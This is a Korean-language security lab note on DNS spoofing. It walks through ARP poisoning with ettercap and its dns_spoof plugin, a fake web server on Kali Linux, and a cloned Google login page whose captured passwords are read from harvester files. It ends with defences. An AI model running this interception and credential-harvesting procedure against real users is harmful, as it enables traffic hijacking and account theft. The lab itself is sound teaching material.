DNS Spoofing

[ 참고 ] ]https://www.keycdn.com/support/dns-spoofing/

꼭 위의 사이트를 참고해보자.

 

DNS Spoofing

> DNS에서 전달하는 IP를 변조하거나 DNS의 서버를 장악하여 사용자가 의도하지 않은 주소로 접속하게 만듬.

> 컴퓨터는 URL 주소를 바로 인식 할수 없음.

So, 사용자로부터 URL주소를 입력 받으면 등록된 DNS의 주소로 UDP프로토콜을 이용하여 질의 보냄.

 

공격원리

> 사용자의 컴퓨터는 보통 컴퓨터가 사용하는 IP 주소대신 사람들이 쓰기 편한 문자로 구성되어 있는 URL주소를 사용한다. 하지만 컴퓨터는 URL주소를 바로 인식할 수 없기 때문에, 사용자로부터 URL주소를 입력을 받으면 등록된 도메인 네임 시스템의 주소로 UDP프로토콜을 이용하여 질의를 보낸다.

 

> 중간자 공격을 이용한 공격

>> 이때 중간자 공격을 받고 있는 경우에는 사용자의 컴퓨터가 보내는 질의의 내용을 수정하여 도메인 네임 시스템서버에 전송.

>> 도메인 네임 시스템서버는 변경된 질의에 대한 답을 사용자의 컴퓨터로 보냄.

>> 사용자의 컴퓨터는 질의에 나와 있는 IP 주소를 이용하여 접속.

>> 이때 이미 질의가 중간자 공격으로 인해 원래의 값이 아니기 때문에 의도치 않은 곳으로 접속될 수 있음.

 

> 사용자의 컴퓨터에 저장된 도메인 네임 시스템주소가 변조되어있을 경우의 공격

>> 만약 사용자의 컴퓨터에 등록되어 있는 도메인 네임 시스템의 IP 주소가 다른 요인으로 인해 이미 변경되어 있을 경우

>> 사용자의 컴퓨터가 제대로 된 질의를 보내도 이미 공격자가 지정한 서버에 질의를 보내게 되므로 의도치 않은 곳으로 접속될 가능성이 있음.

 

용어
Spoofing
> ARP spoofing (arp 캐시테이블을 해커가 원하는 것으로 변조)
> IP spoofing ( ip 스푸핑 어택. 소수의 아이피를 속일 수 있는)
> DNS spoofing
> DHCP spoofing

 

사용시스템
- windows 2008(웹클라이언트) : 192.168.20.201
- Kali Linux                 : 192.168.20.50
- firewall    (방화벽/라우터): 192.168.20.100

 

DNS Spoofing을 하기 위한 기능
(ㄱ) Arp spoofing + IP forwarding
(ㄴ) Fake WEB
(ㄷ) Fake DNS (DNS Spoofing) -> 잘못 된 정보를 제공(다음에 관련된 IP는 자기 IP다).

[실습] dns spoofing 실습.

(KaliLinux)

① KaliLinux에 Fake WEB 서버 설정

 CentOS)     /etc/httpd/conf/httpd.conf
                 /var/www/html/index.html
                 # service httpd restart
                 # chkconfig httpd on
 Debian)      /etc/apache2/apache2.conf
                 /var/www/html/index.html
                 # service apache2 restart
                 # update-rc.d apache2 enable

 

# cd /etc/apache2

# cd /var/www/html
# ls

index.html

# echo "Fake Web Site" > /var/www/html/index.html

# service apache2 restart
# pgrep -lf apache   (# service apache2 status)

# firefox http://192.168.20.50 &
-> 확인 후 종료

 

 DNS Spoofing을 하기 위한기능
 (ㄱ) Arp spoofing + IP forwarding
 (ㄴ) Fake WEB
 (ㄷ) Fake DNS (DNS Spoofing)

 

② ARP Spoofing & dns_spoof plugin load
# cd /etc/ettercap

# vi etter.dns

 

(주의) ettercap 툴을 완전히 종료한 후 다시 실행하고 설정을 한다.
        ettercap 툴이 변경된 /etc/ettercap/etter.dns 파일을 다시 읽어 들이도록 한다.

 

# ettercap -G &
---------------------------------------------------------
 Sniff > Unfied sniffing > eth1

 Hosts > Scan for host
 Hosts > Host list

 192.168.20.100 선택 -> Add to Target 1
 192.168.20.201 선택 -> Add to Target 2

 Mitm > Arp poisoning > Optional parameter
    Sniff remote connection

 Plugins > Manage the plugins > dns_spoof 더블클릭
 Start > Start sniffing
---------------------------------------------------------

(window2008)

③ windows 2008 서버에서 웹브라우저를 실행하고 www.daum.net 접속.
(주의) "ipconfig /flushdns"을 수행하기 전에 반드시 웹브라우저를 전부 종료하고 명령어 수행.
c:\> ipconfig /flushdns

웹브라우저에서 http://www.daum.net 접속.
-> 192.168.20.50 내용이 보인다.

c:\> ipconfig /displaydns | more

 

 

[추가적인 실습] (제한됨)
(KaliLinux)
# cd /var/www/html
# scp 172.16.6.252:/root/security/fakeweb/* /var/www/html
root/centos
# tar xvzf FakeWeb1.tar.gz     /* Fake Web Site : Google */
(Windows)
c:\> ipconfig /flushdns
-> 웹브라우저를 통해 www.daum.net 접속하면 google 사이트가 보임.
-> 로그인 아이디/패스워드 입력(EX: jang4sc@hanmail.net/abc123)

(KaliLinux)
# cd /var/www/html
# cat harvester*
-> 아이디/패스워드가 보인다.

 

(복원) ettercap 종료 
> 절차를 지켜 종료
> mitm > Stop mitm attack > 확인
> Start > Stop sniffing

아이디 패스워드 / 악성코드 다운로드 용도로 자주 씀.

 

대응책.

> arp table에서 MAC 주소의 중복 여부를 확인.
> wireshark에서 나왔듯이 트레픽을 지속적으로 감시.

> gateway의 MAC주소를 static으로 고정.

 

[꼭 읽어보자]

http://oopsys.tistory.com/101